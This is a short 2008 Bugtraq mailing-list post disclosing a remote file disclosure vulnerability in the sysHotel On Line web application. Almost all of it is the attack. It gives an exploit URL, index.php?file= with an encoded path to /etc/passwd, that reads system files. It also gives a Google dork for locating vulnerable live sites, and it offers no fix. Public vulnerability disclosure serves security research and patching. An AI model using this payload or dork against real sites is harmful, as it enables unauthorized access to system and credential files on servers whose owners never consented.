
Date: Tue, 8 Jan 2008 12:03:40 +0100
From: p4imi0 <p4imi0@...il.com>
To: bugtraq@...urityfocus.com
Subject: sysHotel On Line Remote File Disclosure Vulnerability.

--------------------------------------------------------------
sysHotel On Line Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://www.syshotelonline.it/
author      : p4imi0
contact     : p4imi0@...il.com
exploit     : index.php?file==%2Fetc%2Fpasswd
google dork : inurl:"index.php?file=" Powered by sysHotel On Line
thanks to   : str0ke, Cr[]w.
